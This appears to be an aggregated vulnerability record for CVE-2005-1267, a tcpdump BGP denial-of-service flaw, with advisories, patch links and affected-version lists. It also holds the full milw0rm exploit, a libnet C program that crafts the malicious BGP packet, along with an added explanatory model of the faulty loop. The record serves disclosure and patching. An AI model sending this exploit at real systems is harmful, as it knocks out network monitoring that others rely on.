CVE-2005-1267
CVSS 5.0
Published: 2005-06-10 00:00:00
Revised: 2010-08-21 00:28:22

[Original] The bgp_update_print function in tcpdump 3.x does not properly handle a -1 return value from the decode_prefix4 function, which allows remote attackers to cause a denial of service (infinite loop) via a crafted BGP packet.


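[CNNVD] tcpdump BGP 'bgp_update_print' function denial-of-service vulnerability (CNNVD-200506-099)

        The bgp_update_print function in tcpdump 3.x contains a security vulnerability: because it does not correctly handle a -1 return value from the decode_prefix4 function, a remote attacker can trigger a denial of service (infinite loop) with a specially crafted BGP packet.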

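- CVSS (base score)

CVSS score: 5 [MEDIUM]
Confidentiality impact: NONE [no impact on the confidentiality of the system]
Integrity impact: NONE [no impact on the integrity of the system]
Availability impact: PARTIAL [may cause reduced performance or interruptions in resource availability]
Attack complexity: LOW [no access restrictions for exploitation]
Attack vector: [--]
Authentication: NONE [exploitation requires no authentication]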

- CPE (affected platforms and products)

cpe:/o:mandrakesoft:mandrake_linux:10.1  MandrakeSoft Mandrake Linux 10.1
cpe:/o:trustix:secure_linux:2.2  Trustix Secure Linux 2.2
cpe:/a:lbl:tcpdump:3.5_alpha
cpe:/a:lbl:tcpdump:3.6.3
cpe:/a:lbl:tcpdump:3.4a6
cpe:/a:lbl:tcpdump:3.8.1
cpe:/a:lbl:tcpdump:3.9.1
cpe:/a:lbl:tcpdump:3.8.2
cpe:/o:mandrakesoft:mandrake_linux:10.1::x86_64
cpe:/o:trustix:secure_linux:2.0  Trustix Secure Linux 2.0
cpe:/o:trustix:secure_linux:2.1  Trustix Secure Linux 2.1
cpe:/o:redhat:fedora_core:core_3.0
cpe:/a:lbl:tcpdump:3.7.1
cpe:/o:mandrakesoft:mandrake_linux:10.2::x86_64
cpe:/o:mandrakesoft:mandrake_linux:10.2  MandrakeSoft Mandrake Linux 10.2
cpe:/o:gentoo:linux  Gentoo Linux
cpe:/a:lbl:tcpdump:3.6.2
cpe:/a:lbl:tcpdump:3.7
cpe:/a:lbl:tcpdump:3.5.2
cpe:/o:redhat:fedora_core:core_4.0
cpe:/a:lbl:tcpdump:3.8.3
cpe:/a:lbl:tcpdump:3.9
cpe:/a:lbl:tcpdump:3.7.2
cpe:/a:lbl:tcpdump:3.4
cpe:/a:lbl:tcpdump:3.5

- OVAL (technical details for detection)

oval:org.mitre.oval:def:11148  The bgp_update_print function in tcpdump 3.x does not properly handle a -1 return value from the decode_prefix4 function, which allows remot...
*OVAL describes in detail how to detect this vulnerability; more technical details on detection can be found in the related OVAL definition.

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1267
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-1267
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200506-099
(official data source) CNNVD

- Other links and resources

https://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=159208
(VENDOR_ADVISORY)  MISC  https://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=159208
http://www.trustix.org/errata/2005/0028/
(VENDOR_ADVISORY)  TRUSTIX  2005-0028
http://www.redhat.com/archives/fedora-announce-list/2005-June/msg00007.html
(VENDOR_ADVISORY)  FEDORA  FEDORA-2005-406
http://secunia.com/advisories/15634/
(VENDOR_ADVISORY)  SECUNIA  15634
http://www.securityfocus.com/bid/13906
(UNKNOWN)  BID  13906
http://www.securityfocus.com/archive/1/archive/1/430292/100/0/threaded
(UNKNOWN)  FEDORA  FLSA:156139
http://www.redhat.com/support/errata/RHSA-2005-505.html
(UNKNOWN)  REDHAT  RHSA-2005:505
http://www.debian.org/security/2005/dsa-854
(UNKNOWN)  DEBIAN  DSA-854
http://secunia.com/advisories/17118
(UNKNOWN)  SECUNIA  17118

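- Vulnerability information

tcpdump BGP 'bgp_update_print' function denial-of-service vulnerability
Medium severity  Authorization issue
2005-06-10 00:00:00 2005-10-20 00:00:00
Remote
        The bgp_update_print function in tcpdump 3.x contains a security vulnerability: because it does not correctly handle a -1 return value from the decode_prefix4 function, a remote attacker can trigger a denial of service (infinite loop) with a specially crafted BGP packet.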

- Advisories and patches

        The vendors have released upgrade patches to fix this security issue. Patch download links:
        IBM AIX 5.3
        IBM IY77141
        http://www.ibm.com/support/
        LBL libpcap 0.8.3
        RedHat libpcap-0.8.3-6.FC2.3.legacy.i386.rpm
        Fedora Core 2:
        http://download.fedoralegacy.org/fedora/2/updates/i386/libpcap-0.8.3-6.FC2.3.legacy.i386.rpm
        IPCop IPCop 1.4.1
        IPCop IPCop 1.4.6
        http://ipcop.org/modules.php?op=modload&name=Downloads&file=index&req=viewdownload&cid=3&orderby=dateD
        IPCop IPCop 1.4.8
        http://sourceforge.net/project/showfiles.php?group_id=40604&package_id=35093&release_id=351848
        IPCop IPCop 1.4.2
        IPCop IPCop 1.4.6
        http://ipcop.org/modules.php?op=modload&name=Downloads&file=index&req=viewdownload&cid=3&orderby=dateD
        IPCop IPCop 1.4.8
        http://sourceforge.net/project/showfiles.php?group_id=40604&package_id=35093&release_id=351848
        IPCop IPCop 1.4.4
        IPCop IPCop 1.4.6
        http://ipcop.org/modules.php?op=modload&name=Downloads&file=index&req=viewdownload&cid=3&orderby=dateD
        IPCop IPCop 1.4.8
        http://sourceforge.net/project/showfiles.php?group_id=40604&package_id=35093&release_id=351848
        IPCop IPCop 1.4.5
        IPCop IPCop 1.4.6
        http://ipcop.org/modules.php?op=modload&name=Downloads&file=index&req=viewdownload&cid=3&orderby=dateD
        IPCop IPCop 1.4.8
        http://sourceforge.net/project/showfiles.php?group_id=40604&package_id=35093&release_id=351848
        IPCop IPCop 1.4.6
        IPCop IPCop 1.4.8
        http://sourceforge.net/project/showfiles.php?group_id=40604&package_id=35093&release_id=351848
        MandrakeSoft Linux Mandrake 10.1
        Mandriva tcpdump-3.8.3-2.2.101mdk.i586.rpm
        Mandrakelinux 10.1:
        http://www.mandriva.com/en/download
        Mandriva tcpdump-3.8.3-2.2.101mdk.src.rpm
        Mandrakelinux 10.1:
        http://www.mandriva.com/en/download
        MandrakeSoft Linux Mandrake 10.1 x86_64
        Mandriva tcpdump-3.8.3-2.2.101mdk.src.rpm
        Mandrakelinux 10.1/X86_64:
        http://www.mandriva.com/en/download
        Mandriva tcpdump-3.8.3-2.2.101mdk.x86_64.rpm
        Mandrakelinux 10.1/X86_64:
        http://www.mandriva.com/en/download
        MandrakeSoft Linux Mandrake 10.2
        Mandriva tcpdump-3.8.3-2.2.102mdk.i586.rpm
        Mandrakelinux 10.2
        http://www.mandriva.com/en/download
        Mandriva tcpdump-3.8.3-2.2.102mdk.src.rpm
        Mandrakelinux 10.2
        http://www.mandriva.com/en/download
        MandrakeSoft Linux Mandrake 10.2 x86_64
        Mandriva tcpdump-3.8.3-2.2.102mdk.src.rpm
        Mandrakelinux 10.2/X86_64:
        http://www.mandriva.com/en/download
        Mandriva tcpdump-3.8.3-2.2.102mdk.x86_64.rpm
        Mandrakelinux 10.2/X86_64:
        http://www.mandriva.com/en/download
        LBL tcpdump 3.7.2
        RedHat arpwatch-2.1a11-7.9.4.legacy.i386.rpm
        Red Hat Linux 9:
        http://download.fedoralegacy.org/redhat/9/updates/i386/arpwatch-2.1a11-7.9.4.legacy.i386.rpm
        RedHat arpwatch-2.1a11-8.fc1.3.legacy.i386.rpm
        Fedora Core 1:
        http://download.fedoralegacy.org/fedora/1/updates/i386/arpwatch-2.1a11-8.fc1.3.legacy.i386.rpm
        RedHat tcpdump-3.7.2-7.9.4.legacy.i386.rpm
        Red Hat Linux 9:
        http://download.fedoralegacy.org/redhat/9/updates/i386/tcpdump-3.7.2-7.9.4.legacy.i386.rpm
        RedHat tcpdump-3.7.2-8.fc1.3.legacy.i386.rpm
        Fedora Core 1:
        http://download.fedoralegacy.org/fedora/1/updates/i386/tcpdump-3.7.2-8.fc1.3.legacy.i386.rpm

- Vulnerability information (1037)

Tcpdump bgp_update_print Remote Denial of Service Exploit (EDBID:1037)
multiple dos
2005-06-09 Verified
0 simon
N/A
/*
* 2005-05-31: Modified by simon@FreeBSD.org to test tcpdump infinite
* loop vulnerability.
*
* libnet 1.1
* Build a BGP4 update message with what you want as payload
*
* Copyright (c) 2003 Frédéric Raynal <pappy at security-labs organization>
* All rights reserved.
*
* Examples:
*
* empty BGP UPDATE message:
*
* # ./bgp4_update -s 1.1.1.1 -d 2.2.2.2
* libnet 1.1 packet shaping: BGP4 update + payload[raw]
* Wrote 63 byte TCP packet; check the wire.
*
* 13:44:29.216135 1.1.1.1.26214 > 2.2.2.2.179: S [tcp sum ok]
* 16843009:16843032(23) win 32767: BGP (ttl 64, id 242, len 63)
* 0x0000 4500 003f 00f2 0000 4006 73c2 0101 0101 E..?....@.s.....
* 0x0010 0202 0202 6666 00b3 0101 0101 0202 0202 ....ff..........
* 0x0020 5002 7fff b288 0000 0101 0101 0101 0101 P...............
* 0x0030 0101 0101 0101 0101 0017 0200 0000 00 ...............
*
*
* BGP UPDATE with Path Attributes and Unfeasible Routes Length
*
* # ./bgp4_update -s 1.1.1.1 -d 2.2.2.2 -a `printf "\x01\x02\x03"` -A 3 -W 13
* libnet 1.1 packet shaping: BGP4 update + payload[raw]
* Wrote 79 byte TCP packet; check the wire.
*
* 13:45:59.579901 1.1.1.1.26214 > 2.2.2.2.179: S [tcp sum ok]
* 16843009:16843048(39) win 32767: BGP (ttl 64, id 242, len 79)
* 0x0000 4500 004f 00f2 0000 4006 73b2 0101 0101 E..O....@.s.....
* 0x0010 0202 0202 6666 00b3 0101 0101 0202 0202 ....ff..........
* 0x0020 5002 7fff 199b 0000 0101 0101 0101 0101 P...............
* 0x0030 0101 0101 0101 0101 0027 0200 0d41 4141 .........'...AAA
* 0x0040 4141 4141 4141 4141 4141 0003 0102 03 AAAAAAAAAA.....
*
*
* BGP UPDATE with Reachability Information
*
* # ./bgp4_update -s 1.1.1.1 -d 2.2.2.2 -I 7
* libnet 1.1 packet shaping: BGP4 update + payload[raw]
* Wrote 70 byte TCP packet; check the wire.
*
* 13:49:02.829225 1.1.1.1.26214 > 2.2.2.2.179: S [tcp sum ok]
* 16843009:16843039(30) win 32767: BGP (ttl 64, id 242, len 70)
* 0x0000 4500 0046 00f2 0000 4006 73bb 0101 0101 E..F....@.s.....
* 0x0010 0202 0202 6666 00b3 0101 0101 0202 0202 ....ff..........
* 0x0020 5002 7fff e86d 0000 0101 0101 0101 0101 P....m..........
* 0x0030 0101 0101 0101 0101 001e 0200 0000 0043 ...............C
* 0x0040 4343 4343 4343 CCCCCC
*
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
* 1. Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* 2. Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in the
* documentation and/or other materials provided with the distribution.
*
* THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND
* ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
* ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
* FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
* DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
* OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
* HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
* LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
* OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
* SUCH DAMAGE.
*
*/

/* #if (HAVE_CONFIG_H) */
/* #include "../include/config.h" */
/* #endif */
/* #include "./libnet_test.h" */
#include <libnet.h>

void
usage(char *name);


#define set_ptr_and_size(ptr, size, val, flag) \
if (size && !ptr) \
{ \
ptr = (u_char *)malloc(size); \
if (!ptr) \
{ \
printf("memory allocation failed (%u bytes requested)\n", size); \
goto bad; \
} \
memset(ptr, val, size); \
flag = 1; \
} \
\
if (ptr && !size) \
{ \
size = strlen(ptr); \
}



int
main(int argc, char *argv[])
{
int c;
libnet_t *l;
u_long src_ip, dst_ip, length;
libnet_ptag_t t = 0;
char errbuf[LIBNET_ERRBUF_SIZE];
int pp;
u_char *payload = NULL;
u_long payload_s = 0;
u_char marker[LIBNET_BGP4_MARKER_SIZE];

u_short u_rt_l = 0;
u_char *withdraw_rt = NULL;
char flag_w = 0;
u_short attr_l = 0;
u_char *attr = NULL;
char flag_a = 0;
u_short info_l = 0;
u_char *info = NULL;
char flag_i = 0;

printf("libnet 1.1 packet shaping: BGP4 update + payload[raw]\n");

/*
* Initialize the library. Root privileges are required.
*/
l = libnet_init(
LIBNET_RAW4, /* injection type */
NULL, /* network interface */
errbuf); /* error buffer */

if (l == NULL)
{
fprintf(stderr, "libnet_init() failed: %s", errbuf);
exit(EXIT_FAILURE);
}

src_ip = 0;
dst_ip = 0;
memset(marker, 0x1, LIBNET_BGP4_MARKER_SIZE);
memset(marker, 0xff, LIBNET_BGP4_MARKER_SIZE);

while ((c = getopt(argc, argv, "d:s:t:m:p:w:W:a:A:i:I:")) != EOF)
{
switch (c)
{
/*
* We expect the input to be of the form `ip.ip.ip.ip.port`. We
* point cp to the last dot of the IP address/port string and
* then separate them with a NULL byte. The optarg now points to
* just the IP address, and cp points to the port.
*/
case 'd':
if ((dst_ip = libnet_name2addr4(l, optarg, LIBNET_RESOLVE)) == -1)
{
fprintf(stderr, "Bad destination IP address: %s\n", optarg);
exit(EXIT_FAILURE);
}
break;

case 's':
if ((src_ip = libnet_name2addr4(l, optarg, LIBNET_RESOLVE)) == -1)
{
fprintf(stderr, "Bad source IP address: %s\n", optarg);
exit(EXIT_FAILURE);
}
break;

case 'p':
payload = optarg;
payload_s = strlen(payload);
break;

case 'w':
withdraw_rt = optarg;
break;

case 'W':
u_rt_l = atoi(optarg);
break;

case 'a':
attr = optarg;
break;

case 'A':
attr_l = atoi(optarg);
break;

case 'i':
info = optarg;
break;

case 'I':
info_l = atoi(optarg);
break;

default:
exit(EXIT_FAILURE);
}
}

if (!src_ip || !dst_ip)
{
usage(argv[0]);
goto bad;
}

set_ptr_and_size(withdraw_rt, u_rt_l, 0x41, flag_w);
set_ptr_and_size(attr, attr_l, 0x42, flag_a);
set_ptr_and_size(info, info_l, 0x43, flag_i);

/*
* 2005-05-31: Modified by simon@FreeBSD.org to test tcpdump
* infinite loop vulnerability.
*/
if (payload == NULL) {
if ((payload = malloc(16)) == NULL) {
fprintf(stderr, "Out of memory\n");
exit(1);
}
pp = 0;
payload[pp++] = 0;
payload[pp++] = 33;
payload_s = pp;
}

/*
* BGP4 update messages are "dynamic" as fields have variable size. The only
* sizes we know are those for the 2 first fields ... so we need to count them
* plus their value.
*/
length = LIBNET_BGP4_UPDATE_H + u_rt_l + attr_l + info_l + payload_s;
t = libnet_build_bgp4_update(
u_rt_l, /* Unfeasible Routes Length */
withdraw_rt, /* Withdrawn Routes */
attr_l, /* Total Path Attribute Length */
attr, /* Path Attributes */
info_l, /* Network Layer Reachability Information length */
info, /* Network Layer Reachability Information */
payload, /* payload */
payload_s, /* payload size */
l, /* libnet handle */
0); /* libnet id */
if (t == -1)
{
fprintf(stderr, "Can't build BGP4 update header: %s\n", libnet_geterror(l));
goto bad;
}

length+=LIBNET_BGP4_HEADER_H;
t = libnet_build_bgp4_header(
marker, /* marker */
length, /* length */
LIBNET_BGP4_UPDATE, /* message type */
NULL, /* payload */
0, /* payload size */
l, /* libnet handle */
0); /* libnet id */
if (t == -1)
{
fprintf(stderr, "Can't build BGP4 header: %s\n", libnet_geterror(l));
goto bad;
}

length+=LIBNET_TCP_H;
t = libnet_build_tcp(
0x6666, /* source port */
179, /* destination port */
0x01010101, /* sequence number */
0x02020202, /* acknowledgement num */
TH_SYN, /* control flags */
32767, /* window size */
0, /* checksum */
0, /* urgent pointer */
length, /* TCP packet size */
NULL, /* payload */
0, /* payload size */
l, /* libnet handle */
0); /* libnet id */
if (t == -1)
{
fprintf(stderr, "Can't build TCP header: %s\n", libnet_geterror(l));
goto bad;
}

length+=LIBNET_IPV4_H;
t = libnet_build_ipv4(
length, /* length */
0, /* TOS */
242, /* IP ID */
0, /* IP Frag */
64, /* TTL */
IPPROTO_TCP, /* protocol */
0, /* checksum */
src_ip, /* source IP */
dst_ip, /* destination IP */
NULL, /* payload */
0, /* payload size */
l, /* libnet handle */
0); /* libnet id */
if (t == -1)
{
fprintf(stderr, "Can't build IP header: %s\n", libnet_geterror(l));
goto bad;
}

/*
* Write it to the wire.
*/
c = libnet_write(l);
if (c == -1)
{
fprintf(stderr, "Write error: %s\n", libnet_geterror(l));
goto bad;
}
else
{
fprintf(stderr, "Wrote %d byte TCP packet; check the wire.\n", c);
}

if (flag_w) free(withdraw_rt);
if (flag_a) free(attr);
if (flag_i) free(info);

libnet_destroy(l);
return (EXIT_SUCCESS);
bad:
if (flag_w) free(withdraw_rt);
if (flag_a) free(attr);
if (flag_i) free(info);

libnet_destroy(l);
return (EXIT_FAILURE);
}

void
usage(char *name)
{
fprintf(stderr,
"usage: %s -s source_ip -d destination_ip \n"
" [-m marker] [-p payload] [-S payload size]\n"
" [-w Withdrawn Routes] [-W Unfeasible Routes Length]\n"
" [-a Path Attributes] [-A Attribute Length]\n"
" [-i Reachability Information] [-I Reachability Information length]\n",
name);
}

// milw0rm.com [2005-06-09]
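
Why the two payload bytes 0 and 33 set in the proof-of-concept above keep a prefix-walking loop from terminating when the decoder's -1 is not checked, next to the checked form: an added example, not code from tcpdump, from the exploit's author or from this page. `toy_decode_prefix4`, `walk_unchecked`, `walk_checked` and the iteration watchdog are hypothetical, and the loop shape (return value added straight to the cursor) is an assumption made for illustration; the sample buffers are constructed.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Hypothetical stand-in for a prefix decoder (not tcpdump's source).
 * Wire form: one length byte (in bits), then ceil(bits/8) address bytes.
 * Returns the number of bytes consumed, or -1 for an illegal/truncated prefix. */
static int toy_decode_prefix4(const uint8_t *p, size_t avail)
{
    size_t need;

    if (avail < 1 || p[0] > 32)
        return -1;
    need = 1 + ((size_t)p[0] + 7) / 8;
    return need <= avail ? (int)need : -1;
}

enum walk_status { WALK_OK, WALK_BAD_PREFIX, WALK_STUCK, WALK_UNDERRUN };

/* Flawed pattern: the return value is added to the cursor without testing
 * for -1, so an illegal prefix moves the cursor one byte backwards.
 * max_iter is a watchdog for this demo only; without it the loop would
 * never return on SAMPLE_LOOP. */
static enum walk_status walk_unchecked(const uint8_t *buf, size_t len,
                                       unsigned max_iter, unsigned *iters)
{
    long off = 0;

    *iters = 0;
    while (off < (long)len) {
        if (*iters >= max_iter)
            return WALK_STUCK;
        ++*iters;
        off += toy_decode_prefix4(buf + off, len - (size_t)off);
        if (off < 0)            /* keep the model itself memory-safe */
            return WALK_UNDERRUN;
    }
    return WALK_OK;
}

/* Checked pattern: any return value that does not advance the cursor ends
 * the walk, so every iteration consumes at least one byte. */
static enum walk_status walk_checked(const uint8_t *buf, size_t len,
                                     unsigned *iters)
{
    size_t off = 0;

    *iters = 0;
    while (off < len) {
        int used;

        ++*iters;
        used = toy_decode_prefix4(buf + off, len - off);
        if (used <= 0)
            return WALK_BAD_PREFIX;
        off += (size_t)used;
    }
    return WALK_OK;
}

/* Constructed samples. SAMPLE_LOOP: a /0 prefix (1 byte consumed) followed
 * by length 33 (illegal, -1), so the cursor alternates between offsets 0
 * and 1. SAMPLE_GOOD: 10.0.0/24 followed by 192.168/16. */
static const uint8_t SAMPLE_LOOP[] = { 0x00, 0x21 };
static const uint8_t SAMPLE_GOOD[] = { 24, 10, 0, 0, 16, 192, 168 };

int main(void)
{
    unsigned n;
    enum walk_status s;

    s = walk_unchecked(SAMPLE_LOOP, sizeof SAMPLE_LOOP, 1000, &n);
    printf("unchecked, 00 21: status=%d after %u iterations\n", (int)s, n);
    s = walk_checked(SAMPLE_LOOP, sizeof SAMPLE_LOOP, &n);
    printf("checked,   00 21: status=%d after %u iterations\n", (int)s, n);
    s = walk_checked(SAMPLE_GOOD, sizeof SAMPLE_GOOD, &n);
    printf("checked,   good : status=%d after %u iterations\n", (int)s, n);
    return 0;
}
```

The checked walk rejects any non-positive return value rather than only -1, which also covers a decoder that could report zero bytes consumed.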
		

- Vulnerability information (F40559)

Debian Linux Security Advisory 854-1 (PacketStormID:F40559)
2005-10-11 00:00:00
Debian  security.debian.org
advisory,denial of service
linux,debian
CVE-2005-1267

Debian Security Advisory DSA 854-1 - Simon Nielsen discovered that the BGP dissector in tcpdump, a powerful tool for network monitoring and data acquisition, does not properly handle a -1 return value from an internal function that decodes data packets. A specially crafted BGP packet can cause a denial of service via an infinite loop.

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- --------------------------------------------------------------------------
Debian Security Advisory DSA 854-1                     security@debian.org
http://www.debian.org/security/                             Martin Schulze
October 9th, 2005                       http://www.debian.org/security/faq
- --------------------------------------------------------------------------

Package        : tcpdump
Vulnerability  : infinite loop
Problem type   : remote
Debian-specific: no
CVE ID         : CAN-2005-1267

Simon Nielsen discovered that the BGP dissector in tcpdump, a powerful
tool for network monitoring and data acquisition, does not properly
handle a -1 return value from an internal function that decodes data
packets.  A specially crafted BGP packet can cause a denial of service
via an infinite loop.

The old stable distribution (woody) is not affected by this problem.

For the stable distribution (sarge) this problem has been fixed in
version 3.8.3-5sarge1.

We recommend that you upgrade your tcpdump package.


Upgrade Instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 3.1 alias sarge
- --------------------------------

  Source archives:

    http://security.debian.org/pool/updates/main/t/tcpdump/tcpdump_3.8.3-5sarge1.dsc
      Size/MD5 checksum:      666 8a61a856f03b483ec3c74affa09e8bb5
    http://security.debian.org/pool/updates/main/t/tcpdump/tcpdump_3.8.3-5sarge1.diff.gz
      Size/MD5 checksum:    11493 b2976be14da25de46cf57a95f36739da
    http://security.debian.org/pool/updates/main/t/tcpdump/tcpdump_3.8.3.orig.tar.gz
      Size/MD5 checksum:   567116 30645001f4b97019677cad88d3811904

  Alpha architecture:

    http://security.debian.org/pool/updates/main/t/tcpdump/tcpdump_3.8.3-5sarge1_alpha.deb
      Size/MD5 checksum:   301288 afbeb130b92fe734031bd60d5819f615

  AMD64 architecture:

    http://security.debian.org/pool/updates/main/t/tcpdump/tcpdump_3.8.3-5sarge1_amd64.deb
      Size/MD5 checksum:   256412 7096add9926f7db7d1a915cfe19c0629

  ARM architecture:

    http://security.debian.org/pool/updates/main/t/tcpdump/tcpdump_3.8.3-5sarge1_arm.deb
      Size/MD5 checksum:   250446 1846e890ce0ccf7aba4613130d7e2c2d

  Intel IA-32 architecture:

    http://security.debian.org/pool/updates/main/t/tcpdump/tcpdump_3.8.3-5sarge1_i386.deb
      Size/MD5 checksum:   238642 1b8e9a1fe69912492e5bc1285e12a1af

  Intel IA-64 architecture:

    http://security.debian.org/pool/updates/main/t/tcpdump/tcpdump_3.8.3-5sarge1_ia64.deb
      Size/MD5 checksum:   352410 59e00a553c766e41236647a85c898099

  HP Precision architecture:

    http://security.debian.org/pool/updates/main/t/tcpdump/tcpdump_3.8.3-5sarge1_hppa.deb
      Size/MD5 checksum:   271478 0d1d4c3756689ba4efef69a106731c60

  Motorola 680x0 architecture:

    http://security.debian.org/pool/updates/main/t/tcpdump/tcpdump_3.8.3-5sarge1_m68k.deb
      Size/MD5 checksum:   216704 a3e4d0279da8563af9da7a6981f2824a

  Big endian MIPS architecture:

    http://security.debian.org/pool/updates/main/t/tcpdump/tcpdump_3.8.3-5sarge1_mips.deb
      Size/MD5 checksum:   259316 dc533a53d2bdc886547d345073cf56a8

  Little endian MIPS architecture:

    http://security.debian.org/pool/updates/main/t/tcpdump/tcpdump_3.8.3-5sarge1_mipsel.deb
      Size/MD5 checksum:   272054 d5958967c55dc5c08dd3c3c2e546c391

  PowerPC architecture:

    http://security.debian.org/pool/updates/main/t/tcpdump/tcpdump_3.8.3-5sarge1_powerpc.deb
      Size/MD5 checksum:   246300 073605199341d90268b8818cf1917f9d

  IBM S/390 architecture:

    http://security.debian.org/pool/updates/main/t/tcpdump/tcpdump_3.8.3-5sarge1_s390.deb
      Size/MD5 checksum:   247216 50b1f28f1a86402e26f9155f4a790c39

  Sun Sparc architecture:

    http://security.debian.org/pool/updates/main/t/tcpdump/tcpdump_3.8.3-5sarge1_sparc.deb
      Size/MD5 checksum:   247904 e03f3408ac1bd397cbe8bfdb2c2b4b7b


  These files will probably be moved into the stable distribution on
  its next update.

- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce@lists.debian.org
Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.1 (GNU/Linux)

iD8DBQFDSU39W5ql+IAeqTIRAioxAKCh/4Qxu22H6bRtFKNZ6Bqqk4FcZwCfXWe5
JeGk2MOuSGYocUkg3OMWkhI=
=ZO//
-----END PGP SIGNATURE-----

    

- Vulnerability information

17227
tcpdump bgp_update_print() Function Malformed BGP Protocol Data DoS
Remote / Network Access Denial of Service, Input Manipulation
Loss of Availability
Exploit Public

- Vulnerability description

tcpdump contains a flaw that may allow a remote denial of service. The issue is triggered when a crafted BGP packet is parsed, causing an infinite loop, and will result in loss of availability for the service.

- Timeline

2005-06-08 Unknown
2005-06-09 Unknown

- Solution

Upgrade to version 3.9.3 or higher from CVS, as it has been reported to fix this vulnerability. In addition, Simon Nielsen has released a patch for some older versions.

- Related references

- Vulnerability author

- Vulnerability information

tcpdump BGP Decoding Routines Denial Of Service Vulnerability
Failure to Handle Exceptional Conditions 13906
Yes No
2005-06-09 12:00:00 2009-06-23 06:59:00
Discovery of this issue is credited to Simon L. Nielsen.

- Affected program versions

Trustix Secure Linux 2.2
Trustix Secure Linux 2.1
Trustix Secure Enterprise Linux 2.0
Slackware Linux 10.1
Slackware Linux 10.0
Slackware Linux 9.1
Slackware Linux 9.0
Slackware Linux 8.1
Slackware Linux -current
SGI ProPack 3.0
RedHat Linux 9.0 i386
RedHat Enterprise Linux WS 4
RedHat Enterprise Linux ES 4
RedHat Desktop 4.0
Red Hat Fedora Core4
Red Hat Fedora Core3
Red Hat Fedora Core2
Red Hat Fedora Core1
Red Hat Enterprise Linux AS 4
Mandriva Linux Mandrake 10.2 x86_64
Mandriva Linux Mandrake 10.2
Mandriva Linux Mandrake 10.1 x86_64
Mandriva Linux Mandrake 10.1
Mandriva Linux Mandrake 10.0 AMD64
MandrakeSoft Corporate Server 3.0 x86_64
MandrakeSoft Corporate Server 3.0
LBL tcpdump 3.9.1
LBL tcpdump 3.9
LBL tcpdump 3.8.3
+ Debian Linux 3.1 sparc
+ Debian Linux 3.1 s/390
+ Debian Linux 3.1 ppc
+ Debian Linux 3.1 mipsel
+ Debian Linux 3.1 mips
+ Debian Linux 3.1 m68k
+ Debian Linux 3.1 ia-64
+ Debian Linux 3.1 ia-32
+ Debian Linux 3.1 hppa
+ Debian Linux 3.1 arm
+ Debian Linux 3.1 amd64
+ Debian Linux 3.1 alpha
+ Debian Linux 3.1
+ Turbolinux Appliance Server 1.0 Workgroup Edition
+ Turbolinux Appliance Server 1.0 Hosting Edition
+ Turbolinux Appliance Server Hosting Edition 1.0
+ Turbolinux Appliance Server Workgroup Edition 1.0
+ Turbolinux Home
+ Turbolinux Turbolinux 10 F...
+ Turbolinux Turbolinux Desktop 10.0
+ Turbolinux Turbolinux Server 8.0
+ Turbolinux Turbolinux Server 7.0
+ Turbolinux Turbolinux Workstation 8.0
+ Turbolinux Turbolinux Workstation 7.0
+ Ubuntu Ubuntu Linux 5.0 4 powerpc
+ Ubuntu Ubuntu Linux 5.0 4 i386
+ Ubuntu Ubuntu Linux 5.0 4 amd64
+ Ubuntu Ubuntu Linux 4.1 ppc
+ Ubuntu Ubuntu Linux 4.1 ia64
+ Ubuntu Ubuntu Linux 4.1 ia32
LBL tcpdump 3.8.2
LBL tcpdump 3.8.1
+ Mandriva Linux Mandrake 10.0
LBL tcpdump 3.7.2
+ MandrakeSoft Corporate Server 2.1 x86_64
+ MandrakeSoft Corporate Server 2.1
+ MandrakeSoft Multi Network Firewall 2.0
+ Mandriva Linux Mandrake 9.2 amd64
+ Mandriva Linux Mandrake 9.2
+ Mandriva Linux Mandrake 9.1 ppc
+ Mandriva Linux Mandrake 9.1
+ Turbolinux Turbolinux Advanced Server 6.0
+ Turbolinux Turbolinux Desktop 10.0
+ Turbolinux Turbolinux Server 8.0
+ Turbolinux Turbolinux Server 7.0
+ Turbolinux Turbolinux Server 6.5
+ Turbolinux Turbolinux Server 6.1
+ Turbolinux Turbolinux Workstation 8.0
+ Turbolinux Turbolinux Workstation 7.0
+ Turbolinux Turbolinux Workstation 6.1
+ Turbolinux Turbolinux Workstation 6.0
LBL tcpdump 3.7.1
+ FreeBSD FreeBSD 4.7 -RELEASE
+ FreeBSD FreeBSD 4.7
+ Gentoo Linux 1.4 _rc2
+ Gentoo Linux 1.4 _rc1
+ S.u.S.E. Linux 8.1
LBL tcpdump 3.7
